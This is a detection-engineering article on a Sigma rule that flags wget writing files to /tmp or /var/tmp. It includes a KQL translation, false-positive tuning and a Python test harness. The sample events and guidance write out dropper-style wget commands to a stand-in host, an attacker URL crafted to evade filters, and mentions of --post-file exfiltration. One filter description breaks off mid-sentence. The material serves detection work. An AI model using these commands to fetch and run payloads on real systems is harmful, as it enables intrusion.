Adversaries routinely use wget, which ships on most Linux systems, to pull a second-stage payload onto a compromised host and write it to a world-writable temporary directory such as /tmp or /var/tmp before executing it (MITRE ATT&CK T1105, Ingress Tool Transfer). This is file-based rather than fileless activity, and a file-creation rule will not see wget used for exfiltration (for example with --post-file), because that writes nothing locally. SOC teams should hunt for wget creating files under these directories and, on a hit, pivot to the wget command line to establish what was downloaded and from which host. The rule below cites the GobRAT malware reports that motivated it.
Detection Rule
title: Wget Creating Files in Tmp Directory
id: 35a05c60-9012-49b6-a11f-6bab741c9f74
status: test
description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
references:
    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    product: linux
    category: file_event
detection:
    selection:
        Image|endswith: '/wget'
        TargetFilename|startswith:
            - '/tmp/'
            - '/var/tmp/'
    condition: selection
falsepositives:
    - Legitimate downloads of files in the tmp folder.
level: medium
In the Microsoft Sentinel ASIM FileEvent schema the process that writes the file is ActingProcessName and the written file's full path is TargetFilePath (TargetFileName holds only the bare file name), so the Sigma selection maps to:
imFileEvent
| where ActingProcessName endswith "/wget"
| where TargetFilePath startswith "/tmp/" or TargetFilePath startswith "/var/tmp/"
False Positive Scenarios
Scenario: System Update via wget
Description: A system administrator uses wget to download a system update package to a temporary directory as part of a routine maintenance task.
Filter/Exclusion: The file event carries only the local path, so the download URL has to come from the process command line: process.name = "wget" AND NOT process.command_line : "*://update.example.com/*". Match on the parsed hostname rather than a plain substring, or a URL such as http://attacker/x?u=update.example.com will be suppressed too.
Scenario: Scheduled Job for Data Import
Description: A scheduled job runs wget to import data from an internal API endpoint into a temporary directory for processing.
Filter/Exclusion: Scope the exclusion to the specific job, e.g., process.parent.name in (cron, crond, systemd) AND process.command_line : "*://api.internal.example/*". Do not exclude everything launched by the scheduler: cron entries are a common persistence mechanism for exactly the droppers this rule is meant to catch, so a cron-spawned wget pulling from an unknown host must still alert.
Scenario: Temporary File Creation for Debugging
Description: A developer uses wget to fetch a debug file or log snippet into a temporary directory for troubleshooting.
Filter/Exclusion: Filter by user context (e.g., user.name = "dev_user") on the hosts where that account is expected to work. Do not rely on the extension in file.path (.log, .txt): wget -O names the output file freely, and a payload saved as /tmp/debug.txt still runs with sh /tmp/debug.txt.
Scenario: Backup Tool Using wget
Description: A backup tool or script uses wget to download backup archives to a temporary directory before moving them to a long-term storage location.
Filter/Exclusion: Exclude on the launching parent (e.g., process.parent.name = "backup_tool", ideally with its full process.parent.executable path) combined with the backup server's host in process.command_line. Note that tools such as rsync or borgbackup transfer data themselves and do not spawn wget, so their presence on the host is not by itself a reason to exclude.
Scenario: Internal Monitoring Tool Fetching Metrics
Description: An internal monitoring tool uses wget to fetch metrics from a local HTTP endpoint into a temporary directory for analysis.
Filter/Exclusion: File events carry no source IP, so filter on the metrics endpoint's host or port in process.command_line together with the monitoring agent as process.parent.name, or check for known internal endpoints in the `file
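As an added example (not the rule author's code or part of the Sigma project), the following Python replays the rule's selection over constructed Linux file-creation events and then applies the host-based tuning from the false-positive scenarios above. The ALLOWED_HOSTS set, the CommandLine and ParentImage fields enriched onto each event, and the sample events themselves are assumptions for illustration.

```python
# Added example (not code from the rule's author or the Sigma project): replays
# the "Wget Creating Files in Tmp Directory" selection over constructed Linux
# file-creation events and then applies the tuning from the false-positive
# scenarios. Field names follow the Sigma linux/file_event schema (Image,
# TargetFilename); CommandLine and ParentImage are assumed to be enriched
# onto the event by the collector.
from urllib.parse import urlparse

TMP_PREFIXES = ("/tmp/", "/var/tmp/")          # TargetFilename|startswith
URL_SCHEMES = ("http://", "https://", "ftp://")

# Hypothetical allowlist of hosts that legitimate jobs download from
# (patch mirror, internal API). Replace with your own.
ALLOWED_HOSTS = {"update.example.com", "api.internal.example"}

# Constructed sample telemetry (not real logs), one dict per file-creation event.
EVENTS = [
    # 1: classic dropper pattern, shell -> wget -> /tmp, unknown host
    {"Image": "/usr/bin/wget", "TargetFilename": "/tmp/x86_64",
     "CommandLine": "wget http://198.51.100.7/x86_64 -O /tmp/x86_64",
     "ParentImage": "/bin/sh"},
    # 2: admin fetching a package from the patch mirror (scenario 1)
    {"Image": "/usr/bin/wget", "TargetFilename": "/var/tmp/pkg.deb",
     "CommandLine": "wget https://update.example.com/pool/pkg.deb -O /var/tmp/pkg.deb",
     "ParentImage": "/bin/bash"},
    # 3: cron job importing from the internal API (scenario 2)
    {"Image": "/usr/bin/wget", "TargetFilename": "/tmp/feed.json",
     "CommandLine": "wget -q https://api.internal.example/v1/feed -O /tmp/feed.json",
     "ParentImage": "/usr/sbin/cron"},
    # 4: also launched by cron, but the URL is hostile: a parent-only
    #    exclusion would hide this one
    {"Image": "/usr/bin/wget", "TargetFilename": "/tmp/feed.json",
     "CommandLine": "wget -q http://198.51.100.7/feed -O /tmp/feed.json",
     "ParentImage": "/usr/sbin/cron"},
    # 5: curl, not wget: outside this rule's scope
    {"Image": "/usr/bin/curl", "TargetFilename": "/tmp/a.sh",
     "CommandLine": "curl http://198.51.100.7/a.sh -o /tmp/a.sh",
     "ParentImage": "/bin/sh"},
    # 6: /tmpdata/ is not /tmp/: the trailing slash in the prefix matters
    {"Image": "/usr/bin/wget", "TargetFilename": "/tmpdata/report.csv",
     "CommandLine": "wget https://api.internal.example/report -O /tmpdata/report.csv",
     "ParentImage": "/bin/bash"},
    # 7: allowlisted hostname embedded in the query string of a hostile URL:
    #    a substring filter on the command line would wrongly suppress this
    {"Image": "/usr/bin/wget", "TargetFilename": "/tmp/pkg.deb",
     "CommandLine": "wget http://198.51.100.7/d?src=update.example.com -O /tmp/pkg.deb",
     "ParentImage": "/bin/sh"},
]


def sigma_match(ev):
    """The rule's selection: wget creating a file under /tmp/ or /var/tmp/."""
    return (ev["Image"].endswith("/wget")
            and ev["TargetFilename"].startswith(TMP_PREFIXES))


def wget_urls(cmdline):
    """URL arguments on a wget command line (wget accepts several)."""
    return [tok for tok in cmdline.split() if tok.startswith(URL_SCHEMES)]


def is_allowlisted(ev):
    """Tuning: suppress only when every URL's parsed hostname is allowlisted.
    A URL list read from a file (-i) or stdin leaves no URL on the command
    line, so the alert is kept in that case."""
    urls = wget_urls(ev.get("CommandLine", ""))
    if not urls:
        return False
    return all(urlparse(u).hostname in ALLOWED_HOSTS for u in urls)


def triage(events):
    """One verdict per event: 'no_match', 'suppressed' or 'alert'."""
    verdicts = []
    for ev in events:
        if not sigma_match(ev):
            verdicts.append("no_match")
        elif is_allowlisted(ev):
            verdicts.append("suppressed")
        else:
            verdicts.append("alert")
    return verdicts


if __name__ == "__main__":
    for ev, verdict in zip(EVENTS, triage(EVENTS)):
        print(f"{verdict:10s} {ev['ParentImage']} -> {ev['CommandLine']}")
```

Events 4 and 7 are the ones worth studying: the first shows why excluding everything a scheduler launches is too broad, the second why the allowlist must be compared against the parsed hostname rather than searched for as a substring of the command line.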